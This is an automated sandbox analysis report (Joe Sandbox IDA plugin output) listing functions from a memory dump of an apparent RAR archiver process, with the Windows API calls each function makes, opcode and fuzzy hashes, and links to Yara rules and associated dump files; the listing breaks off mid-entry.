Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: 9ad633262f62fb0b34ecdf0333d7a5dab33b92bef6f75d62d3c5959396b1551c
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: 6BE01A20A9870542EF64AF219C917792352AFA4F41F009438CC0EC2797CE3DEC088662

Function 00007FF6256C7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B4A
GetFileType.KERNELBASE(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B56
GetConsoleMode.KERNEL32(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B69

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: c6a8ae9a96e4393ecd71ad092b67b528ca15f5b01819f741889c81ea64f4a0ad
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: BCE08C20E0460242EE688F21AC691380251AF49F81F401038D80FCABA6EE2C98858321

Function 00007FF6256D4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF6256D4255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF6256B6CD9), ref: 00007FF6256D447C

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
Instruction ID: d45f1a4b3e66be67713a1bd09338efeeff5abbf9433fe32c443def061d2e805f
Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
Instruction Fuzzy Hash: 3EE1E422A1968281EF349F25DC001BD67A0FB51B94F644631DB9D87AE9DFBCEC81D702

Function 00007FF6256D1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6256C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6256C7C48), ref: 00007FF6256D1B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6256C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6256C7C48), ref: 00007FF6256D1BD7

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: 2bb8e1690a3dd4f4b97120a290af16e86375f13144b31ebbec1263c5357c2e24
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: BC313763A1964546FB308F20D8053B926A0FB94F78F204334DE6C866D5EFBCCD859741

Function 00007FF6256B681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6256B68AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF6256B68BF

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: f58ee96e35c5c66aab37b5a142350b4886bcdef1729dbdce13c742b1dc700032
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: DA218463D18F8582EB119F29D5510B86360FB98F88B18A331EF4D53666EF38E5E58300

Function 00007FF6256E915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF6256E91CA
new.LIBCMT ref: 00007FF6256E91F2

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0362efd7841f33a64a4297c863bcf5aa041ed09a150819475a5a8936ca3c004
Instruction ID: b00137ac31550916b4afecda43180040c01fd99868cb4b352546e47cc057cf07
Opcode Fuzzy Hash: d0362efd7841f33a64a4297c863bcf5aa041ed09a150819475a5a8936ca3c004
Instruction Fuzzy Hash: 8E11813190AB8282EE60EF54AD043A962E4FF84B94F244635E69D877E6DE7CD8519301

Function 00007FF6256D20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF6256D22EE), ref: 00007FF6256D211B
GetLastError.KERNEL32(?,?,?,00007FF6256D22EE), ref: 00007FF6256D2126

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: b601284fe4868541c0c4f4d726a076a0eeca8fbcd72defa2c1cf604c96aec184
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: 6D018231A1A69182EE748F26AD0057D6261BF54FA0F249A30DB6DC3FE4CE3CE8419701

Function 00007FF6256C7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF6256C7A7B

Part of subcall function 00007FF625712AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF625717EF3

setbuf.LIBCMT ref: 00007FF6256C7A8F

Part of subcall function 00007FF6256C7B44: GetStdHandle.KERNEL32(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B4A
Part of subcall function 00007FF6256C7B44: GetFileType.KERNELBASE(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B56
Part of subcall function 00007FF6256C7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B69

Part of subcall function 00007FF625712ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF625712AD0

Part of subcall function 00007FF625712B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF625712C1C

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
Instruction ID: 7c7b3c7d309a13c9344a814e39287014510d8928ab486adb020c67ba743b1ebd
Opcode Fuzzy Hash: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
Instruction Fuzzy Hash: 4A012910E4D1825AFE38BF761C663B954468FA1B10F00813CE82E8B3D3DE1CAC429B53

Function 00007FF6256D2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF6256D2480
GetLastError.KERNEL32 ref: 00007FF6256D248D

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: b8f29a8e1daf6622e7a4eaff7c2b2fcdcd802acd728e72ade9e17afaef43e9e9
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 2B01A121A0868281EF749F29E8442782361FB40F78F244731D53D811F5CF3CE986D711

Function 00007FF6256D30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF6256D305D,?,?,?,?,?,?,?,?,00007FF6256E4126,?,?,?,?,00000800), ref: 00007FF6256D30F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6256E4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6256D3119

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: 2e036f738f034d2fe308090a60aed569a0b50c9364fa9fb67fb74d1b0efd00e7
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: 02F0AF21B286C141EE709F25FC453B962A0BB4DBD4F400531EA9CC3BA9DE6CD9848A01

Function 00007FF6256FB3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF6256F7F72), ref: 00007FF6256FB41E
LoadLibraryExW.KERNELBASE ref: 00007FF6256FB449

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: d0e9574e91a8ff7213ac69130fe69289c358dc4d3e2eb360c23a53dfc5ae450e
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: AEF01221B2858186FE709F21EC153FA6364BF9CB84F804131E9CDC2AA9DE2CDA448A11

Function 00007FF6256FBA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6256FBACD), ref: 00007FF6256FBA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF6256FBA87

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: d6b1d9af7eac6489bad07ece40dc5b969f5ae1cbd8c6ed62abf6615a807e71ee
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: 5FE06561B7455246DFF85B199895FA91390EB54F80F806035E90BC3E68ED1DD9448B11

Function 00007FF625714A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF625714A8A
GetLastError.KERNEL32 ref: 00007FF625714A9C

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: 29ae2d25c5bd7c6f6c78cf70ea8e0f29330025e815055b14a5c5bb91566ae0c2
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction Fuzzy Hash: 89E0ECA1E9954342FF38AFF2AC2527422966F48F44F58D434DD0DC6356EE2CAC458356

Function 00007FF6256F71FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c218665cb4784b1e09b9813841769d5d78bb8eeb534c01a05b6f747a2e571f56
Instruction ID: 0aa8c7dc7c5e20d7db4bef9474d3df19874444219ba8228d915cc8e42ef81502
Opcode Fuzzy Hash: c218665cb4784b1e09b9813841769d5d78bb8eeb534c01a05b6f747a2e571f56
Instruction Fuzzy Hash: 7FE1CE22E1868291FF308E249C446BE2791FF41F88F040135DE4E8B7EADE2DAC45E712

Function 00007FF6256B72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6256E915C: new.LIBCMT ref: 00007FF6256E91CA
Part of subcall function 00007FF6256E915C: new.LIBCMT ref: 00007FF6256E91F2

new.LIBCMT ref: 00007FF6256B73DE

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
